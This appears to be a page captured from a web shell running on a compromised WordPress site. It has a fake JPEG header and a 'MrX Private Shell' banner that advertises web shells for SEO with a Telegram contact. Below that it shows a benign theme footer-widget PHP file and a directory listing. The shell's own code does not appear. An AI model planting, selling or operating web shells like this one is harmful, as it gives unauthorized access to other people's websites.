����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if ( class_exists( 'Redux' ) ) {
$options = get_option('kasuari_framework');
$kasuari_footer_widget = $options['footer-layout'];
if($kasuari_footer_widget === '1widget-footer') {
register_sidebar( array(
'name' => esc_html__( 'Footer 1', 'kasuari' ),
'id' => 'footer-1',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
}
if($kasuari_footer_widget === '2widget-footer') {
register_sidebar( array(
'name' => esc_html__( 'Footer 1', 'kasuari' ),
'id' => 'footer-1',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
register_sidebar( array(
'name' => esc_html__( 'Footer 2', 'kasuari' ),
'id' => 'footer-2',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
}
if($kasuari_footer_widget === '3widget-footer') {
register_sidebar( array(
'name' => esc_html__( 'Footer 1', 'kasuari' ),
'id' => 'footer-1',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
register_sidebar( array(
'name' => esc_html__( 'Footer 2', 'kasuari' ),
'id' => 'footer-2',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
register_sidebar( array(
'name' => esc_html__( 'Footer 3', 'kasuari' ),
'id' => 'footer-3',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
}
if($kasuari_footer_widget === '4widget-footer') {
register_sidebar( array(
'name' => esc_html__( 'Footer 1', 'kasuari' ),
'id' => 'footer-1',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
register_sidebar( array(
'name' => esc_html__( 'Footer 2', 'kasuari' ),
'id' => 'footer-2',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
register_sidebar( array(
'name' => esc_html__( 'Footer 3', 'kasuari' ),
'id' => 'footer-3',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
register_sidebar( array(
'name' => esc_html__( 'Footer 4', 'kasuari' ),
'id' => 'footer-4',
'description' => '',
'class' => '',
'before_widget' => '<div id="%1$s" class="widget-footer %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="title"><h4 class="widget-title">',
'after_title' => '</h4></div>' ));
}
function kasuari_footer_widget() {
$options = get_option('kasuari_framework');
$kasuari_footer_widget = $options['footer-layout'];
switch ($kasuari_footer_widget){
case '1widget-footer' : ?>
<div class="footer-widget item column column-1">
<?php dynamic_sidebar( 'footer-1' ); ?>
</div>
<?php break;
case '2widget-footer' : ?>
<div class="footer-widget item column column-2">
<?php dynamic_sidebar( 'footer-1' ); ?>
</div>
<div class="footer-widget item column column-2">
<?php dynamic_sidebar( 'footer-2' ); ?>
</div>
<?php break;
case '3widget-footer' : ?>
<div class="footer-widget item column column-3">
<?php dynamic_sidebar( 'footer-1' ); ?>
</div>
<div class="footer-widget item column column-3">
<?php dynamic_sidebar( 'footer-2' ); ?>
</div>
<div class="footer-widget item column column-3">
<?php dynamic_sidebar( 'footer-3' ); ?>
</div>
<?php break;
case '4widget-footer' : ?>
<div class="footer-widget item column column-4">
<?php dynamic_sidebar( 'footer-1' ); ?>
</div>
<div class="footer-widget item column column-4">
<?php dynamic_sidebar( 'footer-2' ); ?>
</div>
<div class="footer-widget item column column-4">
<?php dynamic_sidebar( 'footer-3' ); ?>
</div>
<div class="footer-widget item column column-4">
<?php dynamic_sidebar( 'footer-4' ); ?>
</div>
<?php break; }
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| akmanda-customizer.php | File | 1.92 KB | 0644 |
|
| aq_resizer.php | File | 10.06 KB | 0644 |
|
| comment.php | File | 3.1 KB | 0644 |
|
| custom.php | File | 11.8 KB | 0644 |
|
| inline-styles.php | File | 41.31 KB | 0644 |
|
| meta-box.php | File | 5.82 KB | 0644 |
|
| navigation.php | File | 1.81 KB | 0644 |
|
| thefooter.php | File | 6.08 KB | 0644 |
|